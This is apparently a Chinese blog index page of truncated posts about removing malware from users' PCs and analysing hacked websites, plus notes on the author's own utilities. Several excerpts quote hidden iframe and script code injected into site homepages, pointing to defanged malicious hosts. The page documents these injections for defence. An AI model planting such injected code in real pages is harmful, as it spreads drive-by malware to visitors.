其他

endurer　原創2006-04-19　第1版一位網友反映，他的電腦每次開機瑞星都提示C:/Program Files/Internet Explorer/Iexplore.exe發現病毒。在她發的HijackThis的log(完整log見：http://forum.ikaka.com/topic.asp?board=28&artid=7422438&page=35)中發現如下可疑的項目：  O2 - BHO: wmpdrm -

遭遇使用映像劫持/IFEO 的 Worm.Win32.Avkiller.i/gavuusg.exeendurer 原創2007-07-21 第2版 補充 Kaspersky 的回複2007-07-21 第1版　　中午時一位網友說他的電腦中的金山毒霸和網鏢無法啟動，估計是中標了，讓偶通過QQ遠程協助。　　下載 pe_xscan，掃描log並分析，發現如下可疑項：/===pe_xscan 07-06-23 by Purple Endurer2007-7-21 12:52:28Windows XP

endurer　原創2006-10-19 第1版一位網友的電腦，一開啟IE就彈廣告視窗和什麼工作聯絡之類的訊息框，讓偶幫忙看看。到 http://endurer.ys168.com 下載 HijackThis 掃描log，發現如下可疑項：/----------Logfile of HijackThis v1.99.1Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180

endurer　原創2006-09-08　第2版 補充殺毒軟體的反應2006-09-07　第1版有位網友的電腦，總告發現Backdoor.Gpigeon.uql。於是通過QQ進行遠程協助。到 http://endurer.ys168.com 下載了HijackThis 掃描log，發現如下可疑項目：/-------------------------Logfile of HijackThis v1.99.1Scan saved at 11:22:51, on 2006-9-7Platform:

endurer 原創2007-02-02 第1版一位網友說他的電腦殺毒後，隱藏檔案顯示不出來了，讓偶通過QQ遠程協助幫忙檢修。到 http://endurer.ys168.com 下載了 HijackThis 掃描 log，發現可疑項：/--------O6 - HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel present--------/用 pe_xscan

Worm.Win32.Diskgen.gen/磁碟機也捎帶廣告？endurer 原創2008-02-19 第1版　　昨天一位朋友說他的電腦中毒了，不定期彈廣告，系統反應很慢，請偶幫忙檢修。　　開啟工作管理員檢查進程，發現有2個alg.exe，2個lsass.exe，使用者名稱分別是system和user，終止屬於user的，不料電腦自動重啟~　　那偶就順勢選擇使用帶網路連接的的安全模式來啟動，不料藍屏~　　只好以正常模式啟動，不過在啟動過程中一直按下Shift鍵……　　進入案頭後，下載

一、簡介這個程式是在“瑞星殺毒助手”的“下次啟動時自動刪除病毒檔案”的功能基礎上修改而來，主要是方便我們刪除一些當前無法刪除的檔案，比如一些殺毒軟體檢測到但無法清除/刪除的染毒檔案。 關於"瑞星殺毒助手"請看免費軟體“瑞星殺毒助手”說明和下載二、運行環境: Microsoft WINDOWS 95或其後繼中文版本。 三、程式的介面: 0.0.0006的視窗介面是重新設計的，支援Windows XP 控制項風格。圖1 所示為程式在Windows 2000中運行時的視窗。圖1    0.0.0006

endurer 原創2007-06-12 第1版 原來那個Viking還在，又加了一個Viking，幾個 Trojan 和 和 Worm。網站首頁被植入代碼：/---＜iframe name="tt" src="exobud.htm" width="580" height="25" scrolling="Auto" frameborder="0"＞＜/iframe＞＜iframe src=hxxp://www.m*85*8**53.com.cn/index.htm width=0 height=

　　一、簡介 　　程式運行後會按Time Protocol（RFC868）通過網路擷取時間，如果在5秒鐘內不能成功擷取，會在3秒鐘後繼續重試，直至成功擷取時間。　　成功擷取時間後，程式將嘗試調整電腦系統時間，如果調整成功，會彈出資訊氣球：    成功將您的電腦系統時間校對為：2011-6-11 12:9:47  　　資訊中的時間會以實際擷取的網路時間為準。 　　程式如果調整電腦系統時間不成功，資訊提示將是： 您需要手動調整-_-！未能成功將您的電腦系統時間校對為：2011-6-11 12:9:4

前兩天到南寧出差，購得電子工業出版社發行的《Borland傳奇（第二版）》，幸甚。暇時翻閱，發現一些錯誤，記錄如下。 P3右邊第9行　在ADM/Intel 64位的CPU上而將擁有更強大的ADM　疑為 AMD P105右邊第1-2行　Visual Cafe正每況愈下，逐漸接近被Symantec超越的命運了。Symantec　疑為　JBuilder P110末行　知道競爭的激烈，也深黯競爭之道黯　疑為　諳（謝謝wyoo2008朋友指正） P155 右邊 的圖片說明：Dale

某電力資訊網掛馬Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabelendurer 原創2008-05-28 第1版網頁包含代碼：/---＜iframe src=hxxp://c**5.*5*i***6.us/c5.htm?8888 width=0 h'＞＜iframe src="hxxp://125.*64.*92.*56/iisstart.htm" width="100" height="0"＞＜/iframe＞---/#1 hxxp://c*

遭遇 Trojan.Win32.Agent.kle 等2endurer 原創2008-05-15 第1版（續1）讓網友進入如下處理：把 O23項對應的服務停止並禁用用IceSword強制移除紅色標記的檔案安裝瑞星卡卡安全助手刪除O22和O23項用WinRAR 刪除Windows臨時檔案夾，IE臨時檔案夾，c:/windows/prefetch

endurer 原創2007-02-11 第1版 一位網友發email來說電腦中了灰鴿子，並附有 HijackThis的log。在HijackThis的log發現如下可疑項：/-----O6 - HKCU/Software/Policies/Microsoft/Internet Explorer/Restrictions presentO6 - HKCU/Software/Policies/Microsoft/Internet Explorer/Control Panel presentO23

機器狗的新面孔：開機登入時出現0x0000008E藍屏錯誤2endurer 原創2008-03-17 第1版(續：機器狗的新面孔：開機登入時出現0x0000008E藍屏錯誤1)三、修複先到 http://purpleendurer.ys168.com 下載 FileInfo、bat_do對log中的可疑檔案進行資訊提取、打包和延時刪除。接下來開啟登錄編輯程式，刪除O26 - IFEO: Ras.exe -> ntsd

某文學網站上掛的logo.jpg /logo.exe 更新了endurer 原創2008-05-27 第1版網站首頁 包含代碼：/---＜script src="ads/iw_t.js"＞＜/script＞---/#1 ads/iw_t.js包含代碼：/---＜script src='/images/jin.gif'＞＜/script＞---/#1.1 /images/jin.gif輸出代碼：/---＜script language="javascript" src="hxxp://w**w*.

;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<; Filename: getIEver1

endurer 原創2007-02-01 第1版論壇首頁被加入代碼:/------＜script language="javascript" src="hxxp://*61.146.118.1*1/news***/include*/m***d5.asp?ad*=1****"＞＜/script＞------/m***d5.asp?ad*=1**** 中發現代碼：/------document.write("＜script language=/"javascript/"

　　這幾天在用MASM32按Time

用 MASM32 寫的 4.5KB 的 netstat--NetView：http://download.csdn.net/source/352031NetView 的功能與Windows內建的 netstat 命令相似，用於顯示協議統計資訊和當前 TCP/IP 網路連接，但檔案體積就苗條多了……檔案說明符 : F:/masm32/works/Net_View/NetView.exe屬性 : A---擷取檔案版本資訊大小失敗!建立時間 : 2008-2-11 17:20:0修改時間 : 2008

endurer　原創2006-04-24　第1版在hxxp://www.hj234.com的首頁有代碼:  ＜script language=JavaScript src="hxxp://www.***hj234.com/abc/abc.js"＞＜/script＞  hxxp://www.***hj234.com/abc/abc.js的內容為: document.write("＜iframe height=0 width=0 frameborder=0